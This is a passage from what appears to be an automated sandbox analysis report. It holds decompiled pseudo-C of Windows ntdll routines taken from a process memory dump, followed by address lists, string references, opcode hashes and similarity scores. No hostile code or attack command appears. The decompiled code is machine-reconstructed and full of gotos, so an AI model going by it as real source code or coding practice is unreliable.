                                                                      						asm("int3");
                                                                      						_push(0x1407b60);
                                                                      						_t170 = _v8;
                                                                      						_v28 = 0;
                                                                      						_v40 = 0;
                                                                      						_v24 = 0;
                                                                      						_v17 = 0;
                                                                      						_v32 = 0;
                                                                      						__eflags = _t170 & 0xffff7cf2;
                                                                      						if((_t170 & 0xffff7cf2) != 0) {
                                                                      							L43:
                                                                      							_t77 = 0xc000000d;
                                                                      						} else {
                                                                      							_t79 = _t170 & 0x0000000c;
                                                                      							__eflags = _t79;
                                                                      							if(_t79 != 0) {
                                                                      								__eflags = _t79 - 0xc;
                                                                      								if(_t79 == 0xc) {
                                                                      									goto L43;
                                                                      								} else {
                                                                      									goto L9;
                                                                      								}
                                                                      							} else {
                                                                      								_t170 = _t170 | 0x00000008;
                                                                      								__eflags = _t170;
                                                                      								L9:
                                                                      								_t81 = _t170 & 0x00000300;
                                                                      								__eflags = _t81 - 0x300;
                                                                      								if(_t81 == 0x300) {
                                                                      									goto L43;
                                                                      								} else {
                                                                      									_t138 = _t170 & 0x00000001;
                                                                      									__eflags = _t138;
                                                                      									_v24 = _t138;
                                                                      									if(_t138 != 0) {
                                                                      										__eflags = _t81;
                                                                      										if(_t81 != 0) {
                                                                      											goto L43;
                                                                      										} else {
                                                                      											goto L11;
                                                                      										}
                                                                      									} else {
                                                                      										L11:
                                                                      										_push(_t129);
                                                                      										_t77 = E01326D90( &_v20);
                                                                      										_t130 = _t77;
                                                                      										__eflags = _t130;
                                                                      										if(_t130 >= 0) {
                                                                      											_push(_t174);
                                                                      											__eflags = _t170 & 0x00000301;
                                                                      											if((_t170 & 0x00000301) == 0) {
                                                                      												_t176 = _a8;
                                                                      												__eflags = _t176;
                                                                      												if(__eflags == 0) {
                                                                      													L64:
                                                                      													_t83 =  *[fs:0x18];
                                                                      													_t177 = 0;
                                                                      													__eflags =  *(_t83 + 0xfb8);
                                                                      													if( *(_t83 + 0xfb8) != 0) {
                                                                      														E013276E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                      														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                      													}
                                                                      													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                      													goto L15;
                                                                      												} else {
                                                                      													asm("sbb edx, edx");
                                                                      													_t114 = E013B8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                      													__eflags = _t114;
                                                                      													if(_t114 < 0) {
                                                                      														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                      														E0131B150();
                                                                      													}
                                                                      													_t116 = E013B6D81(_t176,  &_v16);
                                                                      													__eflags = _t116;
                                                                      													if(_t116 >= 0) {
                                                                      														__eflags = _v16 - 2;
                                                                      														if(_v16 < 2) {
                                                                      															L56:
                                                                      															_t118 = E013275CE(_v20, 5, 0);
                                                                      															__eflags = _t118;
                                                                      															if(_t118 < 0) {
                                                                      																L67:
                                                                      																_t130 = 0xc0000017;
                                                                      																goto L32;
                                                                      															} else {
                                                                      																__eflags = _v12;
                                                                      																if(_v12 == 0) {
                                                                      																	goto L67;
                                                                      																} else {
                                                                      																	_t153 =  *0x1408638; // 0x0
                                                                      																	_t122 = L013238A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                      																	_t154 = _v12;
                                                                      																	_t130 = _t122;
                                                                      																	__eflags = _t130;
                                                                      																	if(_t130 >= 0) {
                                                                      																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                      																		__eflags = _t123;
                                                                      																		if(_t123 != 0) {
                                                                      																			_t155 = _a12;
                                                                      																			__eflags = _t155;
                                                                      																			if(_t155 != 0) {
                                                                      																				 *_t155 = _t123;
                                                                      																			}
                                                                      																			goto L64;
                                                                      																		} else {
                                                                      																			E013276E2(_t154);
                                                                      																			goto L41;
                                                                      																		}
                                                                      																	} else {
                                                                      																		E013276E2(_t154);
                                                                      																		_t177 = 0;
                                                                      																		goto L18;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															__eflags =  *_t176;
                                                                      															if( *_t176 != 0) {
                                                                      																goto L56;
                                                                      															} else {
                                                                      																__eflags =  *(_t176 + 2);
                                                                      																if( *(_t176 + 2) == 0) {
                                                                      																	goto L64;
                                                                      																} else {
                                                                      																	goto L56;
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t130 = 0xc000000d;
                                                                      														goto L32;
                                                                      													}
                                                                      												}
                                                                      												goto L35;
                                                                      											} else {
                                                                      												__eflags = _a8;
                                                                      												if(_a8 != 0) {
                                                                      													_t77 = 0xc000000d;
                                                                      												} else {
                                                                      													_v5 = 1;
                                                                      													L0134FCE3(_v20, _t170);
                                                                      													_t177 = 0;
                                                                      													__eflags = 0;
                                                                      													L15:
                                                                      													_t85 =  *[fs:0x18];
                                                                      													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                      													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                      														L18:
                                                                      														__eflags = _t130;
                                                                      														if(_t130 != 0) {
                                                                      															goto L32;
                                                                      														} else {
                                                                      															__eflags = _v5 - _t130;
                                                                      															if(_v5 == _t130) {
                                                                      																goto L32;
                                                                      															} else {
                                                                      																_t86 =  *[fs:0x18];
                                                                      																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                      																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                      																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                      																}
                                                                      																__eflags = _t177;
                                                                      																if(_t177 == 0) {
                                                                      																	L31:
                                                                      																	__eflags = 0;
                                                                      																	L013270F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                      																	goto L32;
                                                                      																} else {
                                                                      																	__eflags = _v24;
                                                                      																	_t91 =  *(_t177 + 0x20);
                                                                      																	if(_v24 != 0) {
                                                                      																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                      																		goto L31;
                                                                      																	} else {
                                                                      																		_t141 = _t91 & 0x00000040;
                                                                      																		__eflags = _t170 & 0x00000100;
                                                                      																		if((_t170 & 0x00000100) == 0) {
                                                                      																			__eflags = _t141;
                                                                      																			if(_t141 == 0) {
                                                                      																				L74:
                                                                      																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                      																				goto L27;
                                                                      																			} else {
                                                                      																				_t177 = E0134FD22(_t177);
                                                                      																				__eflags = _t177;
                                                                      																				if(_t177 == 0) {
                                                                      																					goto L42;
                                                                      																				} else {
                                                                      																					_t130 = E0134FD9B(_t177, 0, 4);
                                                                      																					__eflags = _t130;
                                                                      																					if(_t130 != 0) {
                                                                      																						goto L42;
                                                                      																					} else {
                                                                      																						_t68 = _t177 + 0x20;
                                                                      																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                      																						__eflags =  *_t68;
                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                      																						goto L74;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																			goto L35;
                                                                      																		} else {
                                                                      																			__eflags = _t141;
                                                                      																			if(_t141 != 0) {
                                                                      																				_t177 = E0134FD22(_t177);
                                                                      																				__eflags = _t177;
                                                                      																				if(_t177 == 0) {
                                                                      																					L42:
                                                                      																					_t77 = 0xc0000001;
                                                                      																					goto L33;
                                                                      																				} else {
                                                                      																					_t130 = E0134FD9B(_t177, 0, 4);
                                                                      																					__eflags = _t130;
                                                                      																					if(_t130 != 0) {
                                                                      																						goto L42;
                                                                      																					} else {
                                                                      																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                      																						_t91 =  *(_t177 + 0x20);
                                                                      																						goto L26;
                                                                      																					}
                                                                      																				}
                                                                      																				goto L35;
                                                                      																			} else {
                                                                      																				L26:
                                                                      																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                      																				__eflags = _t94;
                                                                      																				L27:
                                                                      																				 *(_t177 + 0x20) = _t94;
                                                                      																				__eflags = _t170 & 0x00008000;
                                                                      																				if((_t170 & 0x00008000) != 0) {
                                                                      																					_t95 = _a12;
                                                                      																					__eflags = _t95;
                                                                      																					if(_t95 != 0) {
                                                                      																						_t96 =  *_t95;
                                                                      																						__eflags = _t96;
                                                                      																						if(_t96 != 0) {
                                                                      																							 *((short*)(_t177 + 0x22)) = 0;
                                                                      																							_t40 = _t177 + 0x20;
                                                                      																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                                      																							__eflags =  *_t40;
                                                                      																						}
                                                                      																					}
                                                                      																				}
                                                                      																				goto L31;
                                                                      																			}
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                                      														_t106 =  *(_t147 + 0x20);
                                                                      														__eflags = _t106 & 0x00000040;
                                                                      														if((_t106 & 0x00000040) != 0) {
                                                                      															_t147 = E0134FD22(_t147);
                                                                      															__eflags = _t147;
                                                                      															if(_t147 == 0) {
                                                                      																L41:
                                                                      																_t130 = 0xc0000001;
                                                                      																L32:
                                                                      																_t77 = _t130;
                                                                      																goto L33;
                                                                      															} else {
                                                                      																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                                      																_t106 =  *(_t147 + 0x20);
                                                                      																goto L17;
                                                                      															}
                                                                      															goto L35;
                                                                      														} else {
                                                                      															L17:
                                                                      															_t108 = _t106 | 0x00000080;
                                                                      															__eflags = _t108;
                                                                      															 *(_t147 + 0x20) = _t108;
                                                                      															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                      															goto L18;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      											L33:
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L35:
                                                                      						return _t77;
                                                                      					} else {
                                                                      						 *_t75 = 0x1407b80;
                                                                      						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                      						 *_t134 = _t75;
                                                                      						 *0x1407b84 = _t75;
                                                                      						_t73 = E0132EB70(_t134, 0x1407b60);
                                                                      						if( *0x1407b20 != 0) {
                                                                      							_t73 =  *( *[fs:0x30] + 0xc);
                                                                      							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                      								_t73 = E0132FF60( *0x1407b20);
                                                                      							}
                                                                      						}
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      			}

















































                                                                      0x0138be84
                                                                      0x0138be87
                                                                      0x0138be89
                                                                      0x0138be8b
                                                                      0x0138be99
                                                                      0x0138be9d
                                                                      0x0138bea0
                                                                      0x0138beac
                                                                      0x0138beaf
                                                                      0x0138beb1
                                                                      0x0138beb3
                                                                      0x0138beb3
                                                                      0x00000000
                                                                      0x0138bea2
                                                                      0x0138bea2
                                                                      0x00000000
                                                                      0x0138bea2
                                                                      0x0138be8d
                                                                      0x0138be8d
                                                                      0x0138be92
                                                                      0x00000000
                                                                      0x0138be92
                                                                      0x0138be8b
                                                                      0x0138be60
                                                                      0x0138be3b
                                                                      0x0138be3b
                                                                      0x0138be3e
                                                                      0x00000000
                                                                      0x0138be40
                                                                      0x0138be40
                                                                      0x0138be44
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0138be44
                                                                      0x0138be3e
                                                                      0x0138be29
                                                                      0x0138be29
                                                                      0x00000000
                                                                      0x0138be29
                                                                      0x0138be27
                                                                      0x00000000
                                                                      0x0134fba7
                                                                      0x0134fba7
                                                                      0x0134fbab
                                                                      0x0138bf02
                                                                      0x0134fbb1
                                                                      0x0134fbb1
                                                                      0x0134fbb8
                                                                      0x0134fbbd
                                                                      0x0134fbbd
                                                                      0x0134fbbf
                                                                      0x0134fbbf
                                                                      0x0134fbc5
                                                                      0x0134fbcb
                                                                      0x0134fbf8
                                                                      0x0134fbf8
                                                                      0x0134fbfa
                                                                      0x00000000
                                                                      0x0134fc00
                                                                      0x0134fc00
                                                                      0x0134fc03
                                                                      0x00000000
                                                                      0x0134fc09
                                                                      0x0134fc09
                                                                      0x0134fc0f
                                                                      0x0134fc15
                                                                      0x0134fc23
                                                                      0x0134fc23
                                                                      0x0134fc25
                                                                      0x0134fc27
                                                                      0x0134fc75
                                                                      0x0134fc7c
                                                                      0x0134fc84
                                                                      0x00000000
                                                                      0x0134fc29
                                                                      0x0134fc29
                                                                      0x0134fc2d
                                                                      0x0134fc30
                                                                      0x0138bf0f
                                                                      0x00000000
                                                                      0x0134fc36
                                                                      0x0134fc38
                                                                      0x0134fc3b
                                                                      0x0134fc41
                                                                      0x0138bf17
                                                                      0x0138bf19
                                                                      0x0138bf48
                                                                      0x0138bf4b
                                                                      0x00000000
                                                                      0x0138bf1b
                                                                      0x0138bf22
                                                                      0x0138bf24
                                                                      0x0138bf26
                                                                      0x00000000
                                                                      0x0138bf2c
                                                                      0x0138bf37
                                                                      0x0138bf39
                                                                      0x0138bf3b
                                                                      0x00000000
                                                                      0x0138bf41
                                                                      0x0138bf41
                                                                      0x0138bf41
                                                                      0x0138bf41
                                                                      0x0138bf45
                                                                      0x00000000
                                                                      0x0138bf45
                                                                      0x0138bf3b
                                                                      0x0138bf26
                                                                      0x00000000
                                                                      0x0134fc47
                                                                      0x0134fc47
                                                                      0x0134fc49
                                                                      0x0134fcb2
                                                                      0x0134fcb4
                                                                      0x0134fcb6
                                                                      0x0134fcdc
                                                                      0x0134fcdc
                                                                      0x00000000
                                                                      0x0134fcb8
                                                                      0x0134fcc3
                                                                      0x0134fcc5
                                                                      0x0134fcc7
                                                                      0x00000000
                                                                      0x0134fcc9
                                                                      0x0134fcc9
                                                                      0x0134fccd
                                                                      0x00000000
                                                                      0x0134fccd
                                                                      0x0134fcc7
                                                                      0x00000000
                                                                      0x0134fc4b
                                                                      0x0134fc4b
                                                                      0x0134fc4e
                                                                      0x0134fc4e
                                                                      0x0134fc51
                                                                      0x0134fc51
                                                                      0x0134fc54
                                                                      0x0134fc5a
                                                                      0x0134fc5c
                                                                      0x0134fc5f
                                                                      0x0134fc61
                                                                      0x0134fc63
                                                                      0x0134fc65
                                                                      0x0134fc67
                                                                      0x0134fc6e
                                                                      0x0134fc72
                                                                      0x0134fc72
                                                                      0x0134fc72
                                                                      0x0134fc72
                                                                      0x0134fc67
                                                                      0x0134fc61
                                                                      0x00000000
                                                                      0x0134fc5a
                                                                      0x0134fc49
                                                                      0x0134fc41
                                                                      0x0134fc30
                                                                      0x0134fc27
                                                                      0x0134fc03
                                                                      0x0134fbcd
                                                                      0x0134fbd3
                                                                      0x0134fbd9
                                                                      0x0134fbdc
                                                                      0x0134fbde
                                                                      0x0134fc99
                                                                      0x0134fc9b
                                                                      0x0134fc9d
                                                                      0x0134fcd5
                                                                      0x0134fcd5
                                                                      0x0134fc89
                                                                      0x0134fc89
                                                                      0x00000000
                                                                      0x0134fc9f
                                                                      0x0134fc9f
                                                                      0x0134fca3
                                                                      0x00000000
                                                                      0x0134fca3
                                                                      0x00000000
                                                                      0x0134fbe4
                                                                      0x0134fbe4
                                                                      0x0134fbe4
                                                                      0x0134fbe4
                                                                      0x0134fbe9
                                                                      0x0134fbf2
                                                                      0x00000000
                                                                      0x0134fbf2
                                                                      0x0134fbde
                                                                      0x0134fbcb
                                                                      0x0134fbab
                                                                      0x0134fc8b
                                                                      0x0134fc8b
                                                                      0x0134fc8c
                                                                      0x0134fb80
                                                                      0x0134fb72
                                                                      0x0134fb5e
                                                                      0x0134fc8d
                                                                      0x0134fc91
                                                                      0x0134fadf
                                                                      0x0134fadf
                                                                      0x0134fae1
                                                                      0x0134fae4
                                                                      0x0134fae7
                                                                      0x0134faec
                                                                      0x0134faf8
                                                                      0x0134fb00
                                                                      0x0134fb07
                                                                      0x0134fb0f
                                                                      0x0134fb0f
                                                                      0x0134fb07
                                                                      0x00000000
                                                                      0x0134faf8
                                                                      0x0134fadd

                                                                      Strings
                                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0138BE0F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                      • API String ID: 0-865735534
                                                                      • Opcode ID: 7f27e10c795344339a89714f61d9b67324b83eb177374e8c5b24f9accfb6bde8
                                                                      • Instruction ID: c5e712b352a54b77683feb7f6f1921946507b84827cd48f347e92e0349b10cfd
                                                                      • Opcode Fuzzy Hash: 7f27e10c795344339a89714f61d9b67324b83eb177374e8c5b24f9accfb6bde8
                                                                      • Instruction Fuzzy Hash: 15A10371B007068FEB26EF6CC450B6AB7E8AF44718F084569D946CB695DB30EC05CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Re-Waiting
                                                                      • API String ID: 0-316354757
                                                                      • Opcode ID: dee2c8e9a79754c5060c0cd3ff34e39f7536a81798fc8f72d0a3fd28523fb106
                                                                      • Instruction ID: 601ebd749f8b8289b32779feaac1a388359b932562005017fcd9a32db2b2abbe
                                                                      • Opcode Fuzzy Hash: dee2c8e9a79754c5060c0cd3ff34e39f7536a81798fc8f72d0a3fd28523fb106
                                                                      • Instruction Fuzzy Hash: 5D617631A006099FEB36DF6CD850B7FBBEDEB4432CF244269D915972C9C73499008B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 7572ff317e6b08e26eabd046ef06db7c8807481ac5e04675893e925332cda21c
                                                                      • Instruction ID: 6c54aeccc1d084476bcd297d74c4710515496d6eda01ed93bd2e42dd126b4c40
                                                                      • Opcode Fuzzy Hash: 7572ff317e6b08e26eabd046ef06db7c8807481ac5e04675893e925332cda21c
                                                                      • Instruction Fuzzy Hash: 16518F713043429FD725DF28D988B1BBBE5EBC4718F04092DFA5697691D670EC0ACB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction ID: 93d1e9527102e6616ae78d0338d9caebc23cecaf82c58bd7dd93908403e227bd
                                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                      • Instruction Fuzzy Hash: 21517B715047159FD321DF19C840A6BBBF8FF88B18F00892DFA9597690E7B4E914CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryHash
                                                                      • API String ID: 0-2202222882
                                                                      • Opcode ID: 45a77fcc3738b6e184942c7b86924fef2e91cdb553760c686d5ebb48463fc240
                                                                      • Instruction ID: 91c90412e730117fb9b76864103b5c15a8fbe9ff20d961de4cdb30b6a43b88d3
                                                                      • Opcode Fuzzy Hash: 45a77fcc3738b6e184942c7b86924fef2e91cdb553760c686d5ebb48463fc240
                                                                      • Instruction Fuzzy Hash: A84104F1D0152D9BDF21DA64CC84FAEB77CAB5471CF0045A5EA09AB240DB309E888F95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `
                                                                      • API String ID: 0-2679148245
                                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                      • Instruction ID: c4949c326273635b0fbfe849e1aa971aba6f4979cae136191730a628fc3ed917
                                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                      • Instruction Fuzzy Hash: 94310432300356ABE724DE68CD49F977BD9EBC4768F144229FA54AB2C0D7B0E904CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: BinaryName
                                                                      • API String ID: 0-215506332
                                                                      • Opcode ID: 0caa2c9b24ae7c6f0345b92ea6b71edc2d2361c0c63d567b03917d877c4f29ff
                                                                      • Instruction ID: beaef49166964bc714fa6f4b2f7eb8119a8ab0909a62341316d95c58e05a6464
                                                                      • Opcode Fuzzy Hash: 0caa2c9b24ae7c6f0345b92ea6b71edc2d2361c0c63d567b03917d877c4f29ff
                                                                      • Instruction Fuzzy Hash: 2731C3B290151AAFEF15DB6CC945F7BBB78FF80B28F114169E915A7250D7309E04C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @
                                                                      • API String ID: 0-2766056989
                                                                      • Opcode ID: fdd97b2546e15344cb1470a3d34f5e77a48ded59d44ff129807baa3772d0adb3
                                                                      • Instruction ID: dfbd7d3153d45843630122729fc97881b52921c7e19bd9f2223658c3965520d1
                                                                      • Opcode Fuzzy Hash: fdd97b2546e15344cb1470a3d34f5e77a48ded59d44ff129807baa3772d0adb3
                                                                      • Instruction Fuzzy Hash: 7B31A2B1508305DFC361DF6CC980A6BBBE8EBE565CF00092EF99483650D634ED05CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: WindowsExcludedProcs
                                                                      • API String ID: 0-3583428290
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Actx
                                                                      • API String ID: 0-89312691
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • Critical error detected %lx, xrefs: 013C8E21
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Critical error detected %lx
                                                                      • API String ID: 0-802127002
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 013AFF60
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                      • API String ID: 0-1911121157
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                      • Instruction ID: 745ee29f8cec37fb8229d6c3425b9dc9487f2d3581a794633fa8c5e47dc710c8
                                                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                                      • Instruction Fuzzy Hash: 5A31D473604706ABD719DF28DC80A5BBBAAFBC4614F04492DF5568B741DE30E809CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 440dbe5dc5cf762e2c2884284a105c7a95043766c94aa34c19312e3323a2ff1c
                                                                      • Instruction ID: bc05c087d638e7f4b16a77346e5ad1ad632a6b9bd9c972fdb47b6e0cb8ea137b
                                                                      • Opcode Fuzzy Hash: 440dbe5dc5cf762e2c2884284a105c7a95043766c94aa34c19312e3323a2ff1c
                                                                      • Instruction Fuzzy Hash: 334191B1D01209AFEB15DFAAC941BFEFBF4EF48718F14812AE914A7250DB749905CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bb6bc43bad0f098ad4956534536767b3ece5c41912eacea71e1ed67f98a7b478
                                                                      • Instruction ID: 59643b11fbca6b1948617b08a9f32ccab6185abbbfc44d3b5e6a026837c5c47a
                                                                      • Opcode Fuzzy Hash: bb6bc43bad0f098ad4956534536767b3ece5c41912eacea71e1ed67f98a7b478
                                                                      • Instruction Fuzzy Hash: 18314832251715EBC73AAB1CC881F6A77A9FF6272CF11462AF8550B6A4E774F801C790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c4ac2dbb6d53439304db4d7391decc7468533fe4f14670c62de29e31e03e3333
                                                                      • Instruction ID: f676943d1d4b63ba3e6dba303c250a6cf668b52fdfe40dab323fa37264a453b9
                                                                      • Opcode Fuzzy Hash: c4ac2dbb6d53439304db4d7391decc7468533fe4f14670c62de29e31e03e3333
                                                                      • Instruction Fuzzy Hash: 6231EB32A01625DBCB659F2DC841E7ABBF8FF85B88B05806EE949CB750E630D840D790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 508bfb5e3d99fd49e0c56d26050fb617edd0a766193a9e7656c60abfc11cfa38
                                                                      • Instruction ID: 5bb4cd22b8500b83ec1bf059493233aed20a4e3c24b51f6672bd1cc24528def2
                                                                      • Opcode Fuzzy Hash: 508bfb5e3d99fd49e0c56d26050fb617edd0a766193a9e7656c60abfc11cfa38
                                                                      • Instruction Fuzzy Hash: 20417B75A40209DFDB16CF69C880BA9BBF1FB89318F148069E905AB354C774A901CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                      • Instruction ID: 66e69e3894d78c9e331d9045d0618e0dd3e3ea6da1d320c0999b144966045c46
                                                                      • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                      • Instruction Fuzzy Hash: C9313A71A0164BBEDB05FBB8C880BEAFB68BF9620CF04415BD41C97201DB346A59D7E4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 187879d1b975469dbe7df028bdbc7b2b1181017d2466175cb1084cca52acbf22
                                                                      • Instruction ID: 08316cb718469a47b0d2597573aaaedf2555f7c5e52d64efb1109f251841775c
